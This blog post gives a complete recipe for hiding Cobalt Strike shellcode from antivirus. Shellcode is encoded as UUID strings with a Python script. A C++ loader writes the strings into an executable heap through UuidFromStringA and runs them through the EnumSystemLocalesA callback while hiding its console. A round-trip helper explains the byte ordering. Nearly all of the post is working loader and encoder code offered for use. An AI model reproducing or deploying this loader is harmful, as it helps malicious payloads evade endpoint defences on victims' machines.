c1ay's blog

shellcode-uuid AV evasion

2021/01/27

References

RIFT: Analysing a Lazarus Shellcode Execution Method

Generating the UUIDs

Generate Python-format shellcode with Cobalt Strike:
Attacks -> Packages -> Payload Generator
Pick Python as the output language (any language works, since only the raw bytes are needed); x64 shellcode was generated here.


Convert the shellcode to UUIDs with Python. uuid.UUID(bytes_le=u) requires u to be exactly 16 bytes, so the shellcode is split into 16-byte groups and the last group is padded with \x00 when it is short.

import uuid

shellcode = b"shellcode"  # replace with the raw shellcode bytes from Cobalt Strike
# UUID(bytes_le=...) needs exactly 16 bytes, so pad only the last, short chunk;
# (-len) % 16 is 0 when the length is already a multiple of 16.
pad = (-len(shellcode)) % 16
new_shellcode = shellcode + b"\x00" * pad
for i in range(0, len(new_shellcode), 16):
    u = new_shellcode[i:i + 16]
    # print each chunk as a quoted C string, ready to paste into uuids[]
    print('"%s",' % uuid.UUID(bytes_le=u))

Replace the calc-popping UUIDs in the referenced article's code with the UUIDs generated above and compile the C++ code:

Build configuration: the loader's bitness must match the shellcode's.

If the shellcode is 64-bit, build with the Release x64 configuration.

If the shellcode is 32-bit, build with the Release x86 configuration.

#include <Windows.h>
#include <Rpc.h>
#include <cstdio>
#pragma comment(lib, "Rpcrt4.lib")

// Paste the UUID strings produced by the Python script here,
// one quoted string per line, comma-separated.
const char* uuids[] =
{
    uuid
};

int main()
{
    // Detach the console so no window is shown (printf() output is then not visible).
    FreeConsole();

    // Private executable heap: the decoded UUIDs are written straight into it.
    HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    if (hc == NULL) return -1;

    const SIZE_T elems = sizeof(uuids) / sizeof(uuids[0]);
    const SIZE_T size = elems * sizeof(UUID);   // 16 bytes per UUID
    const SIZE_T bufsize = 0x100000;
    if (size > bufsize) { HeapDestroy(hc); return -1; }

    void* ha = HeapAlloc(hc, HEAP_ZERO_MEMORY, bufsize);
    if (ha == NULL) { HeapDestroy(hc); return -1; }

    // UuidFromStringA parses each string into a 16-byte UUID struct whose
    // in-memory layout (Data1/Data2/Data3 little-endian, Data4 verbatim)
    // matches the bytes_le encoding, so the shellcode bytes come back in order.
    UUID* p = (UUID*)ha;
    for (SIZE_T i = 0; i < elems; i++) {
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], &p[i]);
        if (status != RPC_S_OK) {
            printf("UuidFromStringA() != RPC_S_OK\n");
            HeapFree(hc, 0, ha);
            HeapDestroy(hc);
            return -1;
        }
    }

    printf("[*] Hexdump: ");
    for (SIZE_T i = 0; i < size; i++) {
        printf("%02X ", ((unsigned char*)ha)[i]);
    }
    printf("\n");

    // Run the buffer indirectly: EnumSystemLocalesA invokes the supplied
    // callback, so the shellcode executes without a direct call or CreateThread.
    EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0);

    // ha is a heap block, not a handle, so CloseHandle() is wrong here;
    // release the block and destroy the private heap instead.
    HeapFree(hc, 0, ha);
    HeapDestroy(hc);
    return 0;
}
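The encode/decode round trip that the Python script and the C++ loader rely on, as an added example that is not part of the original post or the referenced article: it reproduces the 16-byte splitting step, emits the uuids[] array the loader expects, and decodes the strings back with bytes_le, which is the byte order UuidFromStringA writes into memory on a little-endian Windows host. The shellcode bytes are a constructed placeholder (20 arbitrary bytes, not a real payload) and the function names are assumptions of this example.

```python
import uuid

# Constructed sample "shellcode": 20 arbitrary bytes, deliberately not a
# multiple of 16 so the padding path is exercised. Not a real payload.
SAMPLE_SHELLCODE = bytes(range(0x90, 0x90 + 20))


def shellcode_to_uuids(sc: bytes) -> list:
    """Split shellcode into 16-byte chunks and render each as a UUID string.

    bytes_le is used because it matches the in-memory layout of a Windows
    GUID (Data1/Data2/Data3 little-endian, Data4 verbatim), which is what
    UuidFromStringA writes back into the buffer in the C++ loader.
    """
    pad = (-len(sc)) % 16            # 0 when already aligned: no extra chunk
    sc = sc + b"\x00" * pad
    return [str(uuid.UUID(bytes_le=sc[i:i + 16])) for i in range(0, len(sc), 16)]


def uuids_to_shellcode(uuids: list) -> bytes:
    """Reverse the transform: the bytes the loader's UuidFromStringA loop produces."""
    return b"".join(uuid.UUID(u).bytes_le for u in uuids)


def to_c_array(uuids: list, name: str = "uuids") -> str:
    """Emit the const char* array the loader expects."""
    body = ",\n".join('    "%s"' % u for u in uuids)
    return "const char* %s[] =\n{\n%s\n};" % (name, body)


if __name__ == "__main__":
    ids = shellcode_to_uuids(SAMPLE_SHELLCODE)
    print(to_c_array(ids))

    # Round trip: the decoded buffer is the shellcode plus the NUL padding,
    # so its length is rounded up to the next multiple of 16.
    decoded = uuids_to_shellcode(ids)
    assert decoded[:len(SAMPLE_SHELLCODE)] == SAMPLE_SHELLCODE
    assert len(decoded) == 32

    # Why bytes_le matters: the canonical UUID string is NOT the hex of the
    # chunk; the first three fields are byte-swapped relative to memory order.
    print(SAMPLE_SHELLCODE[:16].hex())   # 909192939495969798999a9b9c9d9e9f
    print(ids[0].replace("-", ""))       # 939291909594979698999a9b9c9d9e9f
```

If the first three fields were not byte-swapped (for example by using uuid.UUID(bytes=...) instead of bytes_le), UuidFromStringA would still parse every string, but the first eight bytes of each 16-byte chunk would land in memory reversed and the shellcode would crash on its first instruction.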

Result: (screenshots omitted)

FreeConsole() can be used to hide the console window; once it has been called the process no longer has a console, so the printf() output above is not displayed.
